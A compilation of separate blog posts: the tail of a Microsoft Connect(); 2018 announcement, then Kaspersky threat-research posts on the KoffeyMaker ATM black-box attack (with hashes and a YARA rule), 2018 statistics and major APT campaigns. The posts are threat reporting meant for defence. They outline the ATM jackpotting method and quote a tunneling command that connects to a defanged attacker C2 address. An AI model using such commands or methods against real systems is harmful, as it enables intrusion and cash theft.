.NET Core 3 Preview is now available, bringing the Windows Presentation Foundation (WPF) and Windows Forms application frameworks to .NET Core. This enables more flexible deployment with side-by-side and self-contained EXEs, better performance and the ability to use native Universal Windows Platform (UWP) controls in Windows Forms and WPF applications via XAML islands. On the server side, check out composable UIs with ASP.NET Core using Razor Components, which provide full-stack web development with .NET for the first time.

For developers looking to build cloud-native, data-driven applications, Azure Cosmos DB offers a fully managed, globally distributed database which supports NoSQL workloads and guarantees less than 10-millisecond low latency and high availability. Today, we’re announcing the general availability of Azure Cosmos DB Shared Throughput Offer with a lowered minimum entry of 400 request units or $24 per month — a 25 times lower entry point — which makes Azure Cosmos DB more accessible to developers who have databases with multiple ‘Azure Cosmos DB containers’.

Microsoft <3 open source

At the heart of great developer innovation is community, and that’s why to open source is so important. We’re committed to empowering developers at every stage of the development lifecycle — from ideation to collaboration to deployment. Our announcements today are not only about open-sourcing more of our own products for community collaboration and contribution, but how we are also actively investing in collaborating on initiatives with others.

Modern container applications often include a variety of components such as containers, databases and virtual machines, and therefore need an easy way to package and maintain the apps in different environments. Today, I’m excited to introduce Cloud Native Application Bundles (CNAB), a new open source package format specification created in close partnership with Docker and supported by HashiCorp, Bitnami and more. With CNAB, you can manage distributed applications using a single installable file, reliably provision application resources in different environments and easily manage the application lifecycle without having to use multiple toolsets.

A year ago, we introduced Virtual Kubelet,Virtual Kubelet (VK), providing a pluggable architecture to extend the Kubernetes API to deploy and manage containers in compute environments like serverless and edge. Since then, a number of VK providers have been added, enabling integrations with multiple services such as Azure Container Instances, AWS Fargate, Alibaba ECI and Azure IoT Edge. Today, we are donating the Virtual Kubelet project to the Cloud Native Computing Foundation (CNCF). By working within the CNCF, we can encourage even more participation and innovations in the community to integrate Kubernetes orchestration with more environments.

I’m also happy to share that we’re delivering on top requests from the .NET community by open-sourcing Windows Presentation Foundation (WPF), Windows Forms and WinUI XAML Library (WinUI). The initial commits add many namespaces and APIs, with more in the coming months. We look forward to receiving your contributions to these repos.

Easier access to technology enables freedom of choice for developers to select the best solution for the project at hand. Today, we’re announcing that the Azure Database for MariaDB service is now generally available. This enterprise-ready, fully managed service for MariaDB community edition provides built-in high availability and elastic scaling, as well as flexible pricing.

Serverless for all

We’re excited to bring the benefits of serverless computing to every app pattern. Whether you are building event-driven functions, running container workloads orchestrated by Kubernetes or simply managing APIs implemented on any platform, you can do it all without worrying about the underlying infrastructure.

Powered by the open source Virtual Kubelet technology, the Azure Kubernetes Service (AKS) virtual node public preview enables serverless Kubernetes. With this new feature, you can elastically provision additional compute capacity in seconds. With a few clicks in the Azure portal, you can turn on the virtual node capability and get the flexibility and portability of a container-focused experience in your AKS environment without worrying about managing the additional compute resources.

Azure Functions enables you to build serverless, event-driven applications in the language of your choice, including .NET, JavaScript and Java. Today, we extend this further with Python support to Azure Functions. Build Linux-based functions using Python either as code or as a Docker container, while enjoying an end-to-end development experience — build, debug/test, publish — using local tooling such as CLI and Visual Studio. Python support brings the serverless approach to machine learning and automation scenarios.

These are just a few of the new tools and services we announced today. I encourage you to look through all the updates and join the live interactive coding sessions at Connect(); 2018. Tune in online today or watch on-demand, explore the code samples shown throughout the event and share what you think on social media (#MSFTConnect). I can’t wait to see what you will build next.

 

 

The post Empowering every developer to achieve more at Microsoft Connect(); 2018 appeared first on The Official Microsoft Blog.

KoffeyMaker: notebook vs. ATM

Despite CCTV and the risk of being caught by security staff, attacks on ATMs using a direct connection — so-called black box attacks — are still popular with cybercriminals. The main reason is the low “entry requirements” for would-be cyber-robbers: specialized sites offer both the necessary tools and how-to instructions.

Kaspersky Lab’ experts investigated one such toolkit, dubbed KoffeyMaker, in 2017-2018, when a number of Eastern European banks turned to us for assistance after their ATMs were quickly and almost freely raided. It soon became clear that we were dealing with a black box attack — a cybercriminal opened the ATM, connected a laptop to the cash dispenser, closed the ATM, and left the crime scene, leaving the device inside. Further investigation revealed the “crime instrument” to be a laptop with ATM dispenser drivers and a patched KDIAG tool; remote access was provided through a connection to a USB GPRS modem. The operating system was Windows, most likely XP, ME, or 7 for better driver compatibility.

ATM dispenser connected to a computer without the necessary drivers

ATM dispenser connected to a computer without the necessary drivers

The situation then unfolded according to the usual scenario: the cybercriminal returned at the appointed hour and pretended to use the ATM, while an accomplice remotely connected to the hidden laptop, ran the KDIAG tool, and instructed the dispenser to issue banknotes. The attacker took the money and later retrieved the laptop, too. The whole operation could well be done solo, but the scheme whereby a “mule” handles the cash and ATM side, while a second “jackpotter” provides technical support for a share of the loot, is more common. A single ATM can spit out tens of thousands of dollars, and only hardware encryption between an ATM PC and its dispenser can prevent an attack from occurring.

Overall, the attack was reminiscent of Cutlet Maker, which we described last year, except for the software tools. We were able to reproduce all the steps of KoffeyMaker in our test lab. All the required software was found without too much difficulty. Legitimate tools were used to carry out the attack with the exception of the patched KDIAG utility, which Kaspersky Lab products detect as RiskTool.Win32.DIAGK.a. Note that the same version of this program was previously used by cybercriminals from the Carbanak group.

Hash sums

KDIAG, incl. patched files
49c708aad19596cca380fd02ab036eb2
9a587ac619f0184bad123164f2aa97ca
2e90763ac4413eb815c45ee044e13a43
b60e43d869b8d2a0071f8a2c0ce371aa
3d1da9b83fe5ef07017cf2b97ddc76f1
45d4f8b3ed5a41f830f2d3ace3c2b031
f2c434120bec3fb47adce00027c2b35e
8fc365663541241ad626183d6a48882a
6677722da6a071499e2308a121b9051d
a731270f952f654b9c31850e9543f4ad
b925ce410a89c6d0379dc56c85d9daf0
d7b647f5bcd459eb395e8c4a09353f0d
0bcb612e6c705f8ba0a9527598bbf3f3
ae962a624866391a4321c21656737dcb
83ac7fdba166519b29bb2a2a3ab480f8

Drivers
84c29dfad3f667502414e50a9446ed3f
46972ca1a08cfa1506d760e085c71c20
ff3e0881aa352351e405978e066d9796
4ea7a6ca093a9118df931ad7492cfed5
a8da5b44f926c7f7d11f566967a73a32
f046dc9e38024ab15a4de1bbfe830701
9a1a781fed629d1d0444a3ae3b6e2882

YARA rule

rule software_zz_patched_KDIAG
{
meta:
 author = "Kaspersky Lab"
 filetype = "PE"
 date = "2018-04-28"
 version = "1.0"
 hash = "49c708aad19596cca380fd02ab036eb2"

strings:
$b0 = { 25 80 00 00 00 EB 13 FF 75 EC }
$b1 = { EB 1F 8D 85 FC FE FF FF 50 68 7B 2F 00 00 }
$s0 = "@$MOD$ 040908 0242/0000 CRS1.EXE W32 Copyright (c) Wincor Nixdorf"
condition:
 (
  uint16(0) == 0x5A4D and
  all of ( $s* ) and
  all of ( $b* )
 )
}

Kaspersky Security Bulletin 2018. Statistics

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity. All the statistics were collected from November 2017 to October 2018.

The year in figures

  • 30 .01% of user computers were subjected to at least one Malware-class web attack over the year.
  • Kaspersky Lab solutions repelled 1 876 998 691 attacks launched from online resources located all over the world.
  • 554 159 621 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 21 643 946 unique malicious objects.
  • 765 538 computers of unique users were targeted by encryptors.
  • 5 638 828 computers of unique users were targeted by miners.
  • Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 830 135 devices.

Fill the form below to download the Kaspersky Security Bulletin 2018. Statistics full report (English, PDF):

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre respectively, they both allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Browser extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

